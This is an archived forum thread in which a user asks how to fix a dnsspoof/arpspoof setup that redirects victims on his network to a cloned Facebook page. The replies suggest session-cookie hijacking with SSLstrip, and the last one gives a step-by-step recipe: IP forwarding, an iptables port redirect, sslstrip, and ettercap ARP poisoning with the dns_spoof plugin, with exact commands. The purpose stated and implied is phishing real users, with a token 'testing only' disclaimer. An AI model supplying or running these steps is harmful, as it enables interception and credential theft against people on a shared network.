Jump to content

Archived

This topic is now archived and is closed to further replies.

Recommended Posts

Hello Guys,

This is my first post here, so please correct me if i'm doing something wrong. :)

OK, so I'm experiencing a very strange problem...

I want to be able to redirect traffic to a local IP address, so I recently installed dsniff on my PC.

Well, I firstly arpspoof the victims successfully and then fire up dnsspoof, using an ordinary dnsspoof.conf file which contains something like this:

facebook.com <ip adress here>

*facebook.com <ip adress here>

When IP forwarding is set to 0, the redirection works perfectly.

However, when the victim tries to visit or ping another site, it is clear that the packets are intercepted, he just can't access the site.

So, I read somewhere that in order for this not to happen, you need to enable IP forwarding. And so I did.

Now, the victim can acess every website,but the thing is that although dnsspoof says that somebody connected to facebook.com, it doesnt redirect him to the cloned facebook site.

Is there a way to fix this problem? (I don't want to use another tool like ettercap and this is for testing purposes only).

Thanks in advance,

TheCppGuy

Share this post


Link to post
Share on other sites

Instead of trying to redirect your ex-girlfriend on to a phishing page you could try to do a MITM attack using session cookies hijacking with SSL STRIP or HAMSTER&FERRET

Please Don't do anything evil / try it in your lab for POC purpose and not against innocent people.

Share this post


Link to post
Share on other sites

I've had the most success with ettercap.

What are you using for ipfoward should be set to 1

What's your IPtables look like?

Share this post


Link to post
Share on other sites

I'll tell you exactly what I do to get this to work.

first run echo 1 > /proc/sys/net/ipv4/ip_forward

then set up ip tables by using iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

start apache2 server

make sure you change the ether config file in /etc. scroll down till you see linux and remove both the "#" from the redid_command_on and reddir_command_off.

edit your etterdns file. /usr/share/ettercap/etter.dns to the spoofed pages you want. Make sure the ip across from the spoofed pages you put are that of your network IP of your computer

then run sslstrip -k -l 8080

then run ettercap

I use the ettercap -G- to use the GUI type ettercap -G, shift+U to get your interface, click it, ctrl+s to scan for hosts, add the host to target 1, then go to manage plugins and double click the dns spoof. Then run the sniffer. ctrl+w. The specefied page you chose in your etterdns file will now be spoofed

if you use the terminal text thing for ettercap just use ettercap -T -q -i (interface) -M arp // // (Thats for all hosts) -P dns_spoof (to run the plugin)

so the steps I use as soon as I turn on my laptop (if I have etterdns and etter.conf done already) are

echo 1 > /proc/sys/net/ipv4/ip_forward

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

start apache2 server

sslstrip -k -l 8080

run the steps in the ettercap gui or the terminal. Hope this helped :3

Share this post


Link to post
Share on other sites

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...